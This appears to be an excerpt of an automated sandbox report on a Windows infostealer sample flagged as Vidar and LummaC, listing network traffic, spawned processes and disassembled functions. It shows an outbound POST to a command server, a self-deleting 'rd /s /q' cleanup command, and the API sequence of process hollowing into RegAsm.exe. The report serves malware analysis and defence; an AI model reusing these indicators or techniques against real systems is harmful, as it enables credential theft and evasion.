2024-09-26 18:15:48 UTC	16384	IN	Data Raw: ff 83 c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 Data Ascii: _^][YVt$W\|$FVBhtw7t7Vg_^jjjh,g!t$
2024-09-26 18:15:48 UTC	16384	IN	Data Raw: 89 4a 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 Data Ascii: J,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^\|$u\|$u_^3ARt$t$PA8tuL$
2024-09-26 18:15:48 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW\|$mw<(6XvutT9 $tB8$tPh $VD $)$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.5	49765	5.75.211.162	443	6696	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 18:15:50 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHDHDBAECGCAFHJJDAKF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 829 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 18:15:50 UTC	829	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 48 44 48 44 42 41 45 43 47 43 41 46 48 4a 4a 44 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 36 30 33 62 31 65 38 31 32 35 37 64 32 63 65 38 36 61 38 66 64 36 65 63 34 66 61 66 63 33 36 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 48 44 42 41 45 43 47 43 41 46 48 4a 4a 44 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 48 44 42 41 45 43 47 43 41 46 48 4a 4a 44 41 4b 46 0d 0a 43 6f 6e 74 Data Ascii: ------GHDHDBAECGCAFHJJDAKFContent-Disposition: form-data; name="token"e603b1e81257d2ce86a8fd6ec4fafc36------GHDHDBAECGCAFHJJDAKFContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------GHDHDBAECGCAFHJJDAKFCont
2024-09-26 18:15:51 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 18:15:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 18:15:51 UTC	15	IN	Data Raw: 35 0d 0a 62 6c 6f 63 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 5block0

Target ID:	0
Start time:	14:13:59
Start date:	26/09/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x50000
File size:	413'224 bytes
MD5 hash:	E02A6087D9257C00071B3CC1508A95EF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2053339176.0000000003465000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.2053339176.0000000003465000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	14:13:59
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	14:14:00
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x3d0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	14:14:00
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x790000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	14:15:02
Start date:	26/09/2024
Path:	C:\ProgramData\FBFHJJJDAF.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\FBFHJJJDAF.exe"
Imagebase:	0xd0000
File size:	385'064 bytes
MD5 hash:	16F5B27C9E1376C17B03BF8C5090DB3C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000007.00000002.2680623811.0000000003455000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	14:15:02
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	14:15:02
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x1f0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	14:15:02
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x180000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	14:15:02
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x110000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	14:15:02
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x7ff632ac0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 0000000C.00000002.2800620495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	14:15:06
Start date:	26/09/2024
Path:	C:\ProgramData\FIEHIIIJDA.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\FIEHIIIJDA.exe"
Imagebase:	0x5f0000
File size:	413'224 bytes
MD5 hash:	2CCE29D734EA1D227B338834698E2DE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 34%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	14:15:06
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	14:15:07
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x4b0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	14:15:07
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xa00000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	14:15:11
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\IIDHJDGCGDAA" & exit
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	14:15:11
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	14:15:11
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 10
Imagebase:	0xab0000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	33.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	57.1%
Total number of Nodes:	14
Total number of Limit Nodes:	0

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 02462131 Relevance: 44.0, APIs: 11, Strings: 14, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,024620A3,02462093), ref: 024622A0
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 024622B3
Wow64GetThreadContext.KERNEL32(000002D4,00000000), ref: 024622D1
ReadProcessMemory.KERNELBASE(0000008C,?,024620E7,00000004,00000000), ref: 024622F5
VirtualAllocEx.KERNELBASE(0000008C,?,?,00003000,00000040), ref: 02462320
TerminateProcess.KERNELBASE(0000008C,00000000), ref: 0246233F
WriteProcessMemory.KERNELBASE(0000008C,00000000,?,?,00000000,?), ref: 02462378
WriteProcessMemory.KERNELBASE(0000008C,00400000,?,?,00000000,?,00000028), ref: 024623C3
WriteProcessMemory.KERNELBASE(0000008C,?,?,00000004,00000000), ref: 02462401
Wow64SetThreadContext.KERNEL32(000002D4,00A80000), ref: 0246243D
ResumeThread.KERNELBASE(000002D4), ref: 0246244C

Strings

WriteProcessMemory, xrefs: 02462244
SetThreadContext, xrefs: 02462257
aryA, xrefs: 02462177
CreateProcessA, xrefs: 024621E5
ReadProcessMemory, xrefs: 0246221E
GetThreadContext, xrefs: 0246220B
VirtualAllocEx, xrefs: 02462231
Load, xrefs: 0246216F
GetP, xrefs: 024621B3
TerminateProcess, xrefs: 0246232F
ress, xrefs: 024621BB
VirtualAlloc, xrefs: 024621F8
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 0246229F
ResumeThread, xrefs: 0246226D

Memory Dump Source

Source File: 00000000.00000002.2052105083.0000000002461000.00000040.00000800.00020000.00000000.sdmp, Offset: 02461000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2461000_file.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2440066154-1257834847
Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction ID: e0124b090bc48bbdfd2b95efe0b5d250494ef11580ac356d428c9f491d55c944
Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction Fuzzy Hash: C1B1E67264024AAFDB60CF68CC80BDA77A5FF88714F158525EA0CAB341D774FA41CB94

Function 00950C40 Relevance: .3, Instructions: 317
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2051912839.0000000000950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e19c51516a4e753ae4ea48b5be6a931538bd768778c42e09d2fc4be99f5b53bf
Instruction ID: e80fb18ab9edc542152c6bb9854ecd47f463557584b8501d6760da0893ead5a9
Opcode Fuzzy Hash: e19c51516a4e753ae4ea48b5be6a931538bd768778c42e09d2fc4be99f5b53bf
Instruction Fuzzy Hash: 22D1AB70A046598FCB11CFA9C9907EDFBF2AF88305F248569E855E7296C734AC49CF90

Function 00951220 Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 009512A0

Memory Dump Source

Source File: 00000000.00000002.2051912839.0000000000950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: a90308c6c2311354721058bcc0932c34b3ebc73eb9e74b769b6fd8858bd506b2
Instruction ID: c36ad22d80159b23241fb624bafa42e08c5619980388a3a34ec4c71d2ccf2869
Opcode Fuzzy Hash: a90308c6c2311354721058bcc0932c34b3ebc73eb9e74b769b6fd8858bd506b2
Instruction Fuzzy Hash: A521F4B1D002499FCB10DFAAD984AEEFBF5FF48310F50842AE959A7250C775A944CFA1

Analysis Process: RegAsm.exePID: 2380, Parent PID: 368COMMON

Execution Graph

Execution Coverage:	4.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.8%
Total number of Nodes:	2000
Total number of Limit Nodes:	30

Executed Functions

Function 00418950 Relevance: 231.5, APIs: 121, Strings: 11, Instructions: 518
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(75900000,004172CA), ref: 00418964
GetProcAddress.KERNEL32 ref: 0041897B
GetProcAddress.KERNEL32 ref: 00418992
GetProcAddress.KERNEL32 ref: 004189A9
GetProcAddress.KERNEL32 ref: 004189C0
GetProcAddress.KERNEL32 ref: 004189D7
GetProcAddress.KERNEL32 ref: 004189EE
GetProcAddress.KERNEL32 ref: 00418A05
GetProcAddress.KERNEL32 ref: 00418A1C
GetProcAddress.KERNEL32 ref: 00418A33
GetProcAddress.KERNEL32 ref: 00418A4A
GetProcAddress.KERNEL32 ref: 00418A61
GetProcAddress.KERNEL32 ref: 00418A78
GetProcAddress.KERNEL32 ref: 00418A8F
GetProcAddress.KERNEL32 ref: 00418AA6
GetProcAddress.KERNEL32 ref: 00418ABD
GetProcAddress.KERNEL32 ref: 00418AD4
GetProcAddress.KERNEL32 ref: 00418AEB
GetProcAddress.KERNEL32 ref: 00418B02
GetProcAddress.KERNEL32 ref: 00418B19
GetProcAddress.KERNEL32 ref: 00418B30
GetProcAddress.KERNEL32 ref: 00418B47
GetProcAddress.KERNEL32 ref: 00418B5E
GetProcAddress.KERNEL32 ref: 00418B75
GetProcAddress.KERNEL32 ref: 00418B8C
GetProcAddress.KERNEL32 ref: 00418BA3
GetProcAddress.KERNEL32 ref: 00418BBA
GetProcAddress.KERNEL32 ref: 00418BD1
GetProcAddress.KERNEL32 ref: 00418BE8
GetProcAddress.KERNEL32 ref: 00418BFF
GetProcAddress.KERNEL32 ref: 00418C16
GetProcAddress.KERNEL32 ref: 00418C2D
GetProcAddress.KERNEL32 ref: 00418C44
GetProcAddress.KERNEL32 ref: 00418C5B
GetProcAddress.KERNEL32 ref: 00418C72
GetProcAddress.KERNEL32 ref: 00418C89
GetProcAddress.KERNEL32 ref: 00418CA0
GetProcAddress.KERNEL32 ref: 00418CB7
GetProcAddress.KERNEL32 ref: 00418CCE
GetProcAddress.KERNEL32 ref: 00418CE5
GetProcAddress.KERNEL32 ref: 00418CFC
GetProcAddress.KERNEL32 ref: 00418D13
GetProcAddress.KERNEL32 ref: 00418D2A
GetProcAddress.KERNEL32(CreateProcessA), ref: 00418D40
GetProcAddress.KERNEL32(GetThreadContext), ref: 00418D56
GetProcAddress.KERNEL32(ReadProcessMemory), ref: 00418D6C
GetProcAddress.KERNEL32(VirtualAllocEx), ref: 00418D82
GetProcAddress.KERNEL32(ResumeThread), ref: 00418D98
GetProcAddress.KERNEL32(WriteProcessMemory), ref: 00418DAE
GetProcAddress.KERNEL32(SetThreadContext), ref: 00418DC4
LoadLibraryA.KERNEL32(004172CA), ref: 00418DD5
LoadLibraryA.KERNEL32 ref: 00418DE6
LoadLibraryA.KERNEL32 ref: 00418DF7
LoadLibraryA.KERNEL32 ref: 00418E08
LoadLibraryA.KERNEL32 ref: 00418E19
LoadLibraryA.KERNEL32 ref: 00418E2A
LoadLibraryA.KERNEL32 ref: 00418E3B
LoadLibraryA.KERNEL32 ref: 00418E4C
LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00418E5C
GetProcAddress.KERNEL32(75FD0000), ref: 00418E77
GetProcAddress.KERNEL32 ref: 00418E8E
GetProcAddress.KERNEL32 ref: 00418EA5
GetProcAddress.KERNEL32 ref: 00418EBC
GetProcAddress.KERNEL32 ref: 00418ED3
GetProcAddress.KERNEL32(734B0000), ref: 00418EF2
GetProcAddress.KERNEL32 ref: 00418F09
GetProcAddress.KERNEL32 ref: 00418F20
GetProcAddress.KERNEL32 ref: 00418F37
GetProcAddress.KERNEL32 ref: 00418F4E
GetProcAddress.KERNEL32 ref: 00418F65
GetProcAddress.KERNEL32 ref: 00418F7C
GetProcAddress.KERNEL32 ref: 00418F93
GetProcAddress.KERNEL32(763B0000), ref: 00418FAE
GetProcAddress.KERNEL32 ref: 00418FC5
GetProcAddress.KERNEL32 ref: 00418FDC
GetProcAddress.KERNEL32 ref: 00418FF3
GetProcAddress.KERNEL32 ref: 0041900A
GetProcAddress.KERNEL32(750F0000), ref: 00419029
GetProcAddress.KERNEL32 ref: 00419040
GetProcAddress.KERNEL32 ref: 00419057
GetProcAddress.KERNEL32 ref: 0041906E
GetProcAddress.KERNEL32 ref: 00419085
GetProcAddress.KERNEL32 ref: 0041909C
GetProcAddress.KERNEL32(75A50000), ref: 004190BB
GetProcAddress.KERNEL32 ref: 004190D2
GetProcAddress.KERNEL32 ref: 004190E9
GetProcAddress.KERNEL32 ref: 00419100
GetProcAddress.KERNEL32 ref: 00419117
GetProcAddress.KERNEL32 ref: 0041912E
GetProcAddress.KERNEL32 ref: 00419145
GetProcAddress.KERNEL32 ref: 0041915C
GetProcAddress.KERNEL32 ref: 00419173
GetProcAddress.KERNEL32(75070000), ref: 0041918E
GetProcAddress.KERNEL32 ref: 004191A5
GetProcAddress.KERNEL32 ref: 004191BC
GetProcAddress.KERNEL32 ref: 004191D3
GetProcAddress.KERNEL32 ref: 004191EA
GetProcAddress.KERNEL32(74E50000), ref: 00419205
GetProcAddress.KERNEL32 ref: 0041921C
GetProcAddress.KERNEL32(75320000), ref: 00419237
GetProcAddress.KERNEL32 ref: 0041924E
GetProcAddress.KERNEL32(6F060000), ref: 0041926D
GetProcAddress.KERNEL32 ref: 00419284
GetProcAddress.KERNEL32 ref: 0041929B
GetProcAddress.KERNEL32 ref: 004192B2
GetProcAddress.KERNEL32 ref: 004192C9
GetProcAddress.KERNEL32 ref: 004192E0
GetProcAddress.KERNEL32 ref: 004192F7
GetProcAddress.KERNEL32 ref: 0041930E
GetProcAddress.KERNEL32(HttpQueryInfoA), ref: 00419324
GetProcAddress.KERNEL32(InternetSetOptionA), ref: 0041933A
GetProcAddress.KERNEL32(74E00000), ref: 00419355
GetProcAddress.KERNEL32 ref: 0041936C
GetProcAddress.KERNEL32 ref: 00419383
GetProcAddress.KERNEL32 ref: 0041939A
GetProcAddress.KERNEL32(74DF0000), ref: 004193B5
GetProcAddress.KERNEL32(6C5B0000), ref: 004193D0
GetProcAddress.KERNEL32 ref: 004193E7
GetProcAddress.KERNEL32 ref: 004193FE
GetProcAddress.KERNEL32 ref: 00419415
GetProcAddress.KERNEL32(6C3C0000,SymMatchString), ref: 0041942F

Strings

SetThreadContext, xrefs: 00418DB4
WriteProcessMemory, xrefs: 00418D9E
VirtualAllocEx, xrefs: 00418D72
SymMatchString, xrefs: 00419429
ResumeThread, xrefs: 00418D88
GetThreadContext, xrefs: 00418D46
dbghelp.dll, xrefs: 00418E52
InternetSetOptionA, xrefs: 0041932A
HttpQueryInfoA, xrefs: 00419314
CreateProcessA, xrefs: 00418D30
ReadProcessMemory, xrefs: 00418D5C

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
API String ID: 2238633743-2740034357
Opcode ID: 3e30b89850b8473fc7cede02b6692b6796462800fa081e8782096f790b2d890e
Instruction ID: 8261b1413bc3cc4e1081ef522fb3a36784379b70ccc82e73ae8bdeed84e113b8
Opcode Fuzzy Hash: 3e30b89850b8473fc7cede02b6692b6796462800fa081e8782096f790b2d890e
